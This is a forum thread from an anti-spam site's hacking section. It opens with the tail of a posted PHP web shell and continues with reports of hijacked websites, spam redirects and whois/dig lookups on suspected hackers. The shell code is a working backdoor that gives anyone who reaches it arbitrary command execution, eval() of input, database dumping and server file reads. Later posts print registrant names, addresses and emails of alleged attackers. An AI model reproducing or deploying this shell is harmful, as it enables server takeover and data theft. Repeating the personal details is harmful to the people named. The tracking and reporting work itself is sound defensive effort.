</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr>
<tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table>
<input type=submit value=">>"></form>';
if($temp)
echo '<pre class="ml1" style="margin-top:5px" id="Output">'.htmlspecialchars($temp).'</pre>';
echo '</div>';
XFooter();
}

function actionConsole(){
if(!empty($_POST['p1'])&&!empty($_POST['p2'])){
$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out']=true;
$_POST['p1'] .= ' 2>&1';
}elseif(!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out']=false;

if(isset($_POST['ajax'])){
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']=true;
ob_start();
echo "d.cf.cmd.value='';\n";
$temp=@iconv($_POST['charset'],'UTF-8',addcslashes("\n$ ".$_POST['p1']."\n".XEx($_POST['p1']),"\n\r\t\\'\0"));
if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)){
if(@chdir($match[1])){
$GLOBALS['cwd']=@getcwd();
echo "c_='".$GLOBALS['cwd']."';";
}
}
echo "d.cf.output.value+='".$temp."';";
echo "d.cf.output.scrollTop=d.cf.output.scrollHeight;";
$temp=ob_get_clean();
echo strlen($temp),"\n",$temp;
exit;
}
XHeader();
echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds=new Array('');
var cur=0;
function kp(e){
var n=(window.Event)?e.which:e.keyCode;
if(n==38){
cur--;
if(cur>=0)
document.cf.cmd.value=cmds[cur];
else
cur++;
}else if(n==40){
cur++;
if(cur < cmds.length)
document.cf.cmd.value=cmds[cur];
else
cur--;
}
}
function add(cmd){
cmds.pop();
cmds.push(cmd);
cmds.push('');
cur=cmds.length-1;
}
</script>";
echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}return false;"><select name=alias>';
foreach($GLOBALS['aliases'] as $n=>$v){
if($v==''){
echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
continue;
}
echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
}
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']=false;
echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
if(!empty($_POST['p1'])){
echo htmlspecialchars("$ ".$_POST['p1']."\n".XEx($_POST['p1']));
}
echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;"
cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd
style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
echo '</form></div><script>d.cf.cmd.focus();</script>';
XFooter();
}

function actionLogout(){
session_destroy();
die('bye!');
}

function actionSelfRemove(){

if($_POST['p1']=='yes')
if(@unlink(preg_replace('!\(\d+\)\s.*!','',__FILE__)))
die('Shell has been removed');
else
echo 'unlink error!';
if($_POST['p1']!='yes')
XHeader();
echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
XFooter();
}

function actionSql(){
class DbClass {
var $type;
var $link;
var $res;
function DbClass($type){
$this->type=$type;
}
function connect($host,$user,$pass,$dbname){
switch($this->type){
case 'mysql':
if($this->link=@mysql_connect($host,$user,$pass,true)) return true;
break;
case 'pgsql':
$host=explode(':',$host);
if(!$host[1]) $host[1]=5432;
if($this->link=@pg_connect("host={$host[0]}port={$host[1]}user=$user password=$pass dbname=$dbname")) return true;
break;
}
return false;
}
function selectdb($db){
switch($this->type){
case 'mysql':
if(@mysql_select_db($db))return true;
break;
}
return false;
}
function query($str){
switch($this->type){
case 'mysql':
return $this->res=@mysql_query($str);
break;
case 'pgsql':
return $this->res=@pg_query($this->link,$str);
break;
}
return false;
}
function fetch(){
$res=func_num_args()?func_get_arg(0):$this->res;
switch($this->type){
case 'mysql':
return @mysql_fetch_assoc($res);
break;
case 'pgsql':
return @pg_fetch_assoc($res);
break;
}
return false;
}
function listDbs(){
switch($this->type){
case 'mysql':
return $this->query("SHOW databases");
break;
case 'pgsql':
return $this->res=$this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
break;
}
return false;
}
function listTables(){
switch($this->type){
case 'mysql':
return $this->res=$this->query('SHOW TABLES');
break;
case 'pgsql':
return $this->res=$this->query("select table_name from information_schema.tables where table_schema!='information_schema' AND table_schema!='pg_catalog'");
break;
}
return false;
}
function error(){
switch($this->type){
case 'mysql':
return @mysql_error();
break;
case 'pgsql':
return @pg_last_error();
break;
}
return false;
}
function setCharset($str){
switch($this->type){
case 'mysql':
if(function_exists('mysql_set_charset'))
return @mysql_set_charset($str,$this->link);
else
$this->query('SET CHARSET '.$str);
break;
case 'pgsql':
return @pg_set_client_encoding($this->link,$str);
break;
}
return false;
}
function loadFile($str){
switch($this->type){
case 'mysql':
return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
break;
case 'pgsql':
$this->query("CREATE TABLE X2(file text);COPY X2 FROM '".addslashes($str)."';select file from X2;");
$r=array();
while($i=$this->fetch())
$r[]=$i['file'];
$this->query('drop table X2');
return array('file'=>implode("\n",$r));
break;
}
return false;
}
function dump($table,$fp=false){
switch($this->type){
case 'mysql':
$res=$this->query('SHOW CREATE TABLE `'.$table.'`');
$create=mysql_fetch_array($res);
$sql=$create[1].";\n";
if($fp) fwrite($fp,$sql); else echo($sql);
$this->query('SELECT * FROM `'.$table.'`');
$head=true;
while($item=$this->fetch()){
$columns=array();
foreach($item as $k=>$v){
if($v==null)
$item[$k]="NULL";
elseif(is_numeric($v))
$item[$k]=$v;
else
$item[$k]="'".@mysql_real_escape_string($v)."'";
$columns[]="`".$k."`";
}
if($head){
$sql='INSERT INTO `'.$table.'` ('.implode(",",$columns).") VALUES \n\t(".implode(",",$item).')';
$head=false;
}else
$sql="\n\t,(".implode(",",$item).')';
if($fp) fwrite($fp,$sql); else echo($sql);
}
if(!$head)
if($fp) fwrite($fp,";\n\n"); else echo(";\n\n");
break;
case 'pgsql':
$this->query('SELECT * FROM '.$table);
while($item=$this->fetch()){
$columns=array();
foreach($item as $k=>$v){
$item[$k]="'".addslashes($v)."'";
$columns[]=$k;
}
$sql='INSERT INTO '.$table.' ('.implode(",",$columns).') VALUES ('.implode(",",$item).');'."\n";
if($fp) fwrite($fp,$sql); else echo($sql);
}
break;
}
return false;
}
};
$db=new DbClass($_POST['type']);
if(@$_POST['p2']=='download'){
$db->connect($_POST['sql_host'],$_POST['sql_login'],$_POST['sql_pass'],$_POST['sql_base']);
$db->selectdb($_POST['sql_base']);
switch($_POST['charset']){
case "Windows-1251": $db->setCharset('cp1251'); break;
case "UTF-8": $db->setCharset('utf8'); break;
case "KOI8-R": $db->setCharset('koi8r'); break;
case "KOI8-U": $db->setCharset('koi8u'); break;
case "cp866": $db->setCharset('cp866'); break;
}
if(empty($_POST['file'])){
ob_start("ob_gzhandler",4096);
header("Content-Disposition: attachment; filename=dump.sql");
header("Content-Type: text/plain");
foreach($_POST['tbl'] as $v)
$db->dump($v);
exit;
}elseif($fp=@fopen($_POST['file'],'w')){
foreach($_POST['tbl'] as $v)
$db->dump($v,$fp);
fclose($fp);
unset($_POST['p2']);
}else
die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
}
XHeader();
echo "
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
<td><select name='type'><option value='mysql' ";
if(@$_POST['type']=='mysql')echo 'selected';
echo ">MySql</option><option value='pgsql' ";
if(@$_POST['type']=='pgsql')echo 'selected';
echo ">PostgreSql</option></select></td>
<td><input type=text name=sql_host value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
<td><input type=text name=sql_login value='". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."'></td>
<td><input type=text name=sql_pass value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
$tmp="<input type=text name=sql_base value=''>";
if(isset($_POST['sql_host'])){
if($db->connect($_POST['sql_host'],$_POST['sql_login'],$_POST['sql_pass'],$_POST['sql_base'])){
switch($_POST['charset']){
case "Windows-1251": $db->setCharset('cp1251'); break;
case "UTF-8": $db->setCharset('utf8'); break;
case "KOI8-R": $db->setCharset('koi8r'); break;
case "KOI8-U": $db->setCharset('koi8u'); break;
case "cp866": $db->setCharset('cp866'); break;
}
$db->listDbs();
echo "<select name=sql_base><option value=''></option>";
while($item=$db->fetch()){
list($key,$value)=each($item);
echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
}
echo '</select>';
}
else echo $tmp;
}else
echo $tmp;
echo "</td>
<td><input type=submit value='>>' onclick='fs(d.sf);'></td>
<td><input type=checkbox name=sql_count value='on'".(empty($_POST['sql_count'])?'':' checked').">
count the number of rows</td>
</tr>
</table>
<script>
s_db='".@addslashes($_POST['sql_base'])."';
function fs(f){
if(f.sql_base.value!=s_db){ f.onsubmit=function(){};
if(f.p1) f.p1.value='';
if(f.p2) f.p2.value='';
if(f.p3) f.p3.value='';
}
}
function st(t,l){
d.sf.p1.value='select';
d.sf.p2.value=t;
if(l&&d.sf.p3) d.sf.p3.value=l;
d.sf.submit();
}
function is(){
for(i=0;i<d.sf.elements['tbl[]'].length;++i)
d.sf.elements['tbl[]'][i].checked=!d.sf.elements['tbl[]'][i].checked;
}
</script>";
if(isset($db)&&$db->link){
echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
if(!empty($_POST['sql_base'])){
$db->selectdb($_POST['sql_base']);
echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
$tbls_res=$db->listTables();
while($item=$db->fetch($tbls_res)){
list($key,$value)=each($item);
if(!empty($_POST['sql_count']))
$n=$db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
$value=htmlspecialchars($value);
echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."',1)\">".$value."</a>".(empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>")."</nobr><br>";
}
echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
if(@$_POST['p1']=='select'){
$_POST['p1']='query';
$_POST['p3']=$_POST['p3']?$_POST['p3']:1;
$db->query('SELECT COUNT(*) as n FROM '.$_POST['p2']);
$num=$db->fetch();
$pages=ceil($num['n'] / 30);
echo "<script>d.sf.onsubmit=function(){st(\"".$_POST['p2']."\",d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']}records) Page # <input type=text name='p3' value=".((int)$_POST['p3']).">";
echo " of $pages";
if($_POST['p3'] > 1)
echo " <a href=# onclick='st(\"".$_POST['p2'].'",'.($_POST['p3']-1).")'>&lt; Prev</a>";
if($_POST['p3'] < $pages)
echo " <a href=# onclick='st(\"".$_POST['p2'].'",'.($_POST['p3']+1).")'>Next &gt;</a>";
$_POST['p3']--;
if($_POST['type']=='pgsql')
$_POST['p2']='SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
else
$_POST['p2']='SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
echo "<br><br>";
}
if((@$_POST['p1']=='query')&&!empty($_POST['p2'])){
$db->query(@$_POST['p2']);
if($db->res!==false){
$title=false;
echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
$line=1;
while($item=$db->fetch()){
if(!$title){
echo '<tr>';
foreach($item as $key=>$value)
echo '<th>'.$key.'</th>';
reset($item);
$title=true;
echo '</tr><tr>';
$line=2;
}
echo '<tr class="l'.$line.'">';
$line=$line==1?2:1;
foreach($item as $key=>$value){
if($value==null)
echo '<td><i>null</i></td>';
else
echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
}
echo '</tr>';
}
echo '</table>';
}else {
echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
}
}
echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();
return false;'><textarea name='query' style='width:100%;height:100px'>";
if(!empty($_POST['p2'])&&($_POST['p1']!='loadfile'))
echo htmlspecialchars($_POST['p2']);
echo "</textarea><br/><input type=submit value='Execute'>";
echo "</td></tr>";
}
echo "</table></form><br/>";
if($_POST['type']=='mysql'){
$db->query("SELECT 1 FROM mysql.user WHERE concat(`user`,'@',`host`)=USER() AND `File_priv`='y'");
if($db->fetch())
echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;
document.sf.submit();return false;'>
<span>Load file</span> <inputclass='toolsInp' type=text name=f><input type=submit value='>>'>
</form>";
}
if(@$_POST['p1']=='loadfile'){
$file=$db->loadFile($_POST['p2']);
echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
}
}else {
echo htmlspecialchars($db->error());
}
echo '</div>';
XFooter();
}
function actionRC(){
if(!@$_POST['p1']){
$a=array(
"uname"=>php_uname(),
"php_version"=>phpversion(),
"X_version"=>X_VERSION,
"safemode"=>@ini_get('safe_mode')
);
echo serialize($a);
}else {
eval($_POST['p1']);
}
}
if(empty($_POST['a']))if(isset($default_action)&&function_exists('action'.$default_action))
$_POST['a']=$default_action;else$_POST['a']='SecInfo';
if(!empty($_POST['a'])&&function_exists('action'.$_POST['a']))
call_user_func('action'.$_POST['a']);exit;
?>
Amouse
Spam Reporter
 
Posts: 140
Joined: Sat Jun 13, 2009 11:34 pm

zsp2.neostrada.pl

Postby Red Dwarf » Sun Jan 16, 2011 4:28 pm

zsp2.neostrada.pl is a hijacked site with the following sample redirections
Code: Select all
http://zsp2.neostrada.pl/dawh.html
http://zsp2.neostrada.pl/epbli.html
http://zsp2.neostrada.pl/njhnjn.html
http://zsp2.neostrada.pl/oaowm.html
http://zsp2.neostrada.pl/obhlz.html
http://zsp2.neostrada.pl/owccl.html
http://zsp2.neostrada.pl/qpl.html
http://zsp2.neostrada.pl/qqwskfgg.html
http://zsp2.neostrada.pl/ri.html
http://zsp2.neostrada.pl/s.html
http://zsp2.neostrada.pl/uf.html
http://zsp2.neostrada.pl/yv.html
http://zsp2.neostrada.pl/zjludzjn.html


Redirection targets include
buy-softwareshop.ru Software piracy http://spamtrackers.eu/wiki/index.php/EuroSoft
fawdoctor.com Pharmacy fraud http://spamtrackers.eu/wiki/index.php/Pharmacy_Express
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10448
Joined: Tue Jun 27, 2006 2:01 am

windyplains.co.za

Postby Red Dwarf » Sun Jan 16, 2011 4:48 pm

windyplains.co.za has been hijacked. Samples:
Code: Select all
http://www.windyplains.co.za/ccwddpyd.html
http://www.windyplains.co.za/eaa.html
http://www.windyplains.co.za/evfo.html
http://www.windyplains.co.za/ewgpwg.html
http://www.windyplains.co.za/kbmqhyxo.html
http://www.windyplains.co.za/kz.html
http://www.windyplains.co.za/nbvefw.html
http://www.windyplains.co.za/o.html
http://www.windyplains.co.za/qp.html
http://www.windyplains.co.za/rrworvko.html
http://www.windyplains.co.za/sswqnprv.html
http://www.windyplains.co.za/tp.html
http://www.windyplains.co.za/uibp.html
http://www.windyplains.co.za/uvtoyq.html
http://www.windyplains.co.za/wgyjmm.html


Redirection targets include
buy-softwareshop.ru Software piracy http://spamtrackers.eu/wiki/index.php/EuroSoft
fawdoctor.com Pharmacy fraud http://spamtrackers.eu/wiki/index.php/Pharmacy_Express

The site owner should clean off all of the hijack files, and fix the security on the web site.
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10448
Joined: Tue Jun 27, 2006 2:01 am

Re: Compromised hosts

Postby Amouse » Sun Jan 16, 2011 4:49 pm

Another spam run is in progress as I write and started over 9 hours ago.
The same IP address is being used.
Amouse
Spam Reporter
 
Posts: 140
Joined: Sat Jun 13, 2009 11:34 pm

tarentaalrandsafari.co.za

Postby Red Dwarf » Sun Jan 16, 2011 5:02 pm

tarentaalrandsafari.co.za has been hijacked. Samples:
Code: Select all
http://www.tarentaalrandsafari.co.za/cjntv.html
http://www.tarentaalrandsafari.co.za/dmkokl.html
http://www.tarentaalrandsafari.co.za/e.html
http://www.tarentaalrandsafari.co.za/hzlfsfqd.html
http://www.tarentaalrandsafari.co.za/jmjnaqko.html
http://www.tarentaalrandsafari.co.za/kdei.html
http://www.tarentaalrandsafari.co.za/kdtkffl.html
http://www.tarentaalrandsafari.co.za/l.html
http://www.tarentaalrandsafari.co.za/mfmtrgj.html
http://www.tarentaalrandsafari.co.za/mtxlr.html
http://www.tarentaalrandsafari.co.za/uizianc.html
http://www.tarentaalrandsafari.co.za/vizqi.html
http://www.tarentaalrandsafari.co.za/wk.html
http://www.tarentaalrandsafari.co.za/x.html
http://www.tarentaalrandsafari.co.za/xlib.html
http://www.tarentaalrandsafari.co.za/ygifcf.html
http://www.tarentaalrandsafari.co.za/ykogf.html
http://www.tarentaalrandsafari.co.za/yuserxml.html


Redirection targets include
buy-softwareshop.ru Software piracy http://spamtrackers.eu/wiki/index.php/EuroSoft
fawdoctor.com Pharmacy fraud http://spamtrackers.eu/wiki/index.php/Pharmacy_Express

The site owner should clean off all of the hijack files, and fix the security on the web site.
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10448
Joined: Tue Jun 27, 2006 2:01 am

Re: tarentaalrandsafari.co.za

Postby AlphaCentauri » Sun Jan 16, 2011 5:46 pm

Red Dwarf wrote:tarentaalrandsafari.co.za has been hijacked.


There's an iframe on some of the legitimate pages linking to 178.17.163.109/z/index.php -- currently not loading for me, but be careful. That website is pretty thouroughly pwned.

Unbelievably, eNom has STILL not suspended fawdoctor.com or the other Pharmacy Express domains like medicanki.com or medicamor.com receiving traffic from the multiple websites that have been illegally accessed by these spammers. There is no affiliate number in the URLs linking from the hijacked sites -- there is no indication that anyone other than the Pharmacy Express domain owner himself is responsible for the hijacking of innocent websites.

Meanwhile tarentaalrandsafari.co.za has such a bad reputation on MyWot that the thumbnail is blurred out (done as a precaution for sites that are rated that low, as they might have content like child porn images). I know eNom has been informed of the situation for nearly three weeks, maybe longer. The owners of the hijacked websites ought to have their attorneys contact eNom about its continued facilitation of the damage being done to their reputations. It seems to be the only thing the current management at eNom understands.
User avatar
AlphaCentauri
You are kiillllling-a my bizinisss!
 
Posts: 5989
Joined: Thu Mar 01, 2007 3:01 am

Re: Compromised hosts

Postby Amouse » Mon Jan 17, 2011 12:09 am

Word Press web sites being hacked.

Code: Select all
hXXp://wnazura.com/wp-admin/before/breathe.html
hXXp://pv.dashway.com/wp-content/central/creature.html
hXXp://website.trigon.website.pl/_wp_generated/rabbit/bleed.html
hXXp://piko.nl/wp-content/through/lightly.html
hXXp://www.thebelltower.org/wp-content/dark/company.html
hXXp://yorkshiremasonryspecialist.co.uk/wp-includes/deny/jeans.html
hXXp://onlinefreeadds.com/wp-includes/anyway/corridor.html
hXXp://atrakcyjnestrony.pl/wp-admin/toilet/wave.html
hXXp://favorite-cafe.com/wp-content/pound/vision.html
hXXp://36organic.pl/wp-includes/studio/hire.html
hXXp://promorb.ro/wp-includes/wrong/after.html
hXXp://witkowski.ipws.pl/wp-includes/inch/sand.html
hXXp://gravyjefferson.com/wp-content/vehicle/realize.html
hXXp://rogues-racing.com/wp-includes/nearly/journey.html
hXXp://toyourbestofhealth.com/wp-admin/court/snow.html

OSCommerce web sites being hacked.
Code: Select all
hXXp://sklep.kos-serwis.pl/logs/spirit/
hXXp://www.thaiwax.co.cc/images/ Tag Hacked by Number 7

Joomla web sites being hacked.

Code: Select all
hXXp://www.deansart.co.nz/administrator/
hXXp://www.screensignsupplies.com/admin/includes/couple/

The above site has Content encoding error which is known Joomla bug.
This means the following web sites can probably be assigned to the Joomla list without the need to visit every site. A simple grep gives this list.
Code: Select all
hXXp://www.mundopiercing.com/admin/includes/weak/flag.html
hXXp://www.lecoccinelle.eu/negozio/admin/includes/wine/silk.html
hXXp://www.scubazar.com/admin/includes/depth/surely.html
hXXp://www.epocaricambi.com/admin/includes/restaurant/cost.html
hXXp://store.rockyourpets.com/admin/includes/sell/deeply.html
hXXp://www.modellmanufaktur.com/zen-cart/admin/includes/conceal/speed.html Check Joomla OK
hXXp://shop.shunsui.net/admin/includes/foot/baby.html
hXXp://www.diverservice.it/e-shop/admin/includes/policeman/alongside.html
hXXp://www.shotcrete.bz/admin/includes/effort/ground.html
hXXp://www.museobonsai.it/shop/admin/includes/summer/desk.html
hXXp://www.music-world.it/shop/admin/includes/goddamn/float.html
hXXp://www.immobiliarelogiudice.it/logiudice/admin/includes/studio/reveal.html Check Joomla OK
hXXp://www.tougei-taian.com/modules/zox/admin/includes/handsome/shut.html
hXXp://www.bomboniereninfee.it/admin/includes/stone/unlock.html

PrestaShop hXXp://www.prestashop.com/

Code: Select all
hXXp://bassix.nl/classes/concern/


Unknown web site package
Code: Select all
hXXp://imagejunctionsalon.com/images/  > rxpillstablets.com
hXXp://paradosiaki-foresia.gr/images/beam/
hXXp://green-energia.gr/photovoltaic/peer/
hXXp://wholesale-shoes-factory.com/pictures/range/ > greattabletscapsule.net
hXXp://sidneilino.com.br/relief/heavy/ Tag in top level Hacked by Mhiman Hnc > tabletscapsulesdrugstore.net

Special note. The above web site may be trying to drop a file on browsers machines.
hXXp://silverdutchman.nl/Media/strong/

Extra info from Mhiman tag.

Domain Name:HACKER-NEWBIE.ORG
Created On:09-May-2009 10:30:14 UTC
Last Updated On:10-Jul-2010 00:23:49 UTC
Expiration Date:09-May-2011 10:30:14 UTC
Sponsoring Registrar:CV. Jogjacamp (R1830-LROR)
Status:CLIENT TRANSFER PROHIBITED
Registrant ID:DI_9722235
Registrant Name:Al zea arafat
Registrant Organization:belidonk.org
Registrant Street1:BTN Griya Kuningan permai
Registrant Street2:
Registrant Street3:
Registrant City:Kuningan
Registrant State/Province:Jawa Barat
Registrant Postal Code:45511
Registrant Country:ID
Registrant Phone:+62.000000
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:n4is3n@fedora.or.id

dig hXXp://www.hacker-newbie.org

; <<>> DiG 9.6-ESV-R3 <<>> hXXp://www.hacker-newbie.org
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8739
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 0

;; QUESTION SECTION:
;www.hacker-newbie.org. IN A

;; ANSWER SECTION:
hXXp://www.hacker-newbie.org. 14400 IN CNAME hacker-newbie.org.
hacker-newbie.org. 14370 IN A 180.235.148.57

;; AUTHORITY SECTION:
hacker-newbie.org. 86370 IN NS id4.dracoola.net.
hacker-newbie.org. 86370 IN NS id3.dracoola.net.

;; Query time: 302 msec
;; SERVER: 203.114.168.2#53(203.114.168.2)
;; WHEN: Mon Jan 17 17:02:41 2011
;; MSG SIZE rcvd: 117

dig mx hacker-newbie.org

; <<>> DiG 9.6-ESV-R3 <<>> mx hacker-newbie.org
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59894
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 0

;; QUESTION SECTION:
;hacker-newbie.org. IN MX

;; ANSWER SECTION:
hacker-newbie.org. 14400 IN MX 10 aspmx.l.google.com.

;; AUTHORITY SECTION:
hacker-newbie.org. 86400 IN NS id3.dracoola.net.
hacker-newbie.org. 86400 IN NS id4.dracoola.net.

;; Query time: 329 msec
;; SERVER: 203.114.168.2#53(203.114.168.2)
;; WHEN: Mon Jan 17 17:02:56 2011
;; MSG SIZE rcvd: 117

Choice... Another stupid hacker using google for their mail... Vinton's security team must be having a great time tracking down these scum.

inetnum: 180.235.148.0 - 180.235.151.255
netname: ARDH-ID
descr: PT. ARDH GLOBAL INDONESIA
descr: Corporate / Direct member IDNIC
descr: Komplek Ruko Golden Madrid II Blok B-23
descr: BSD-City, Tangerang, Banten 15321.
country: ID

It takes hours to check the amount of web site urls I have and I have RSI so I just do not have the ability to check all.

When spammy is finished his current spam run I will publish a list of URL's that I have collected since I last published.
Amouse
Spam Reporter
 
Posts: 140
Joined: Sat Jun 13, 2009 11:34 pm

Re: Compromised hosts

Postby Amouse » Mon Jan 17, 2011 3:54 am

I think this one warrants being investigated by the Dept of Homeland Security.

A search on this active member of newbie hacker ArRay a.k.a XterM brings up this web site.

Code: Select all
hXXp://armypratama.eu/


Lots of hacking tools some written by ArRay a.k.a XterM

Code: Select all
hXXp://www.facebook.com/armypratama

Armÿ Pratama
Studied Networking at STMIK Bidakara Lives in Manhattan, New York From Jakarta, Indonesia

Domain Reg armypratama.eu
Name Paul R Everett
Organisation N/A
Language German
Address 412 Thorngate Drive
D-39042 Brandon
Germany
Phone +49 6014975401
Email korek_minjem@yahoo.com

dig armypratama.eu

; <<>> DiG 9.6-ESV-R3 <<>> armypratama.eu
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 39124
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 0

;; QUESTION SECTION:
;armypratama.eu. IN A

;; ANSWER SECTION:
armypratama.eu. 11986 IN A 74.86.183.210

;; AUTHORITY SECTION:
armypratama.eu. 83986 IN NS ns1.speedydns.net.
armypratama.eu. 83986 IN NS ns2.speedydns.net.

;; Query time: 105 msec
;; SERVER: 203.114.168.2#53(203.114.168.2)
;; WHEN: Mon Jan 17 20:43:13 2011
;; MSG SIZE rcvd: 97

whois 74.86.183.210
#
# Query terms are ambiguous. The query is assumed to be:
# "n 74.86.183.210"
#
# Use "?" to get help.
#

#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=74.86 ... ARIN=false
#

NetRange: 74.86.0.0 - 74.86.255.255
CIDR: 74.86.0.0/16
OriginAS: AS36351
NetName: SOFTLAYER-4-4
NetHandle: NET-74-86-0-0-1
Parent: NET-74-0-0-0-0
NetType: Direct Allocation
NameServer: NS2.ARPA.GLOBAL-DATACENTER.COM
NameServer: NS1.ARPA.GLOBAL-DATACENTER.COM
Comment: abuse@softlayer.com
RegDate: 2007-05-16
Updated: 2009-08-26
Ref: http://whois.arin.net/rest/net/NET-74-86-0-0-1

OrgName: SoftLayer Technologies Inc. < Criminal spam supporter.
OrgId: SOFTL
Address: 1950 N Stemmons Freeway
City: Dallas
StateProv: TX
PostalCode: 75207
Country: US

Some of these hackers make themselves easy targets.
Amouse
Spam Reporter
 
Posts: 140
Joined: Sat Jun 13, 2009 11:34 pm

Re: Compromised hosts

Postby spamislame » Mon Jan 17, 2011 10:51 am

Huh.

You originally lost me about here:

Amouse wrote:hXXp://sidneilino.com.br/relief/heavy/ Tag in top level Hacked by Mhiman Hnc > tabletscapsulesdrugstore.net
Special note. The above web site may be trying to drop a file on browsers machines.
hXXp://silverdutchman.nl/Media/strong/

Extra info from Mhiman tag.

Domain Name:HACKER-NEWBIE.ORG

Huh.

http://sidneilino.com.br/

Code: Select all
===================================================================
-__Status : Deface
-__Nick : Mhiman HNc
-__Forum : Hacker-Newbie.org
-__Notice For Admin : Check Ur Security
-__Mhiman note Messege : Don't Panic Your Database Safe
-__Thanks For : Onestree[IHT],Up_[HNc]Jahat[HNc],N4is3N[HNc],l1n6g4[HNc],All my Hacker-newbie.org And All Indonesian Hacker Team
-=-[ Hacker-newbie.org ]-=-

He's posted this to one other server, rupagroup.net, but they took it down.

Have you contacted the operator or the hosting company of that site? Might be worth asking how they got in.

hacker-newbie.org is hosted on IP 180.235.148.57, located in Tangerang, Banten, Indonesia.

SiL

P.S.: Also check out these files on that compromised host:

http://sidneilino.com.br/relief/412c1ec8358dabd85428d95019f250fa.che
http://sidneilino.com.br/relief/584c175287019332837633e29bea1a55.che

SiL
User avatar
spamislame
Site Admin
 
Posts: 5056
Joined: Tue May 09, 2006 9:18 am

PreviousNext

Return to Botnets, Hijacks and Hacking

Who is online

Users browsing this forum: No registered users and 1 guest

cron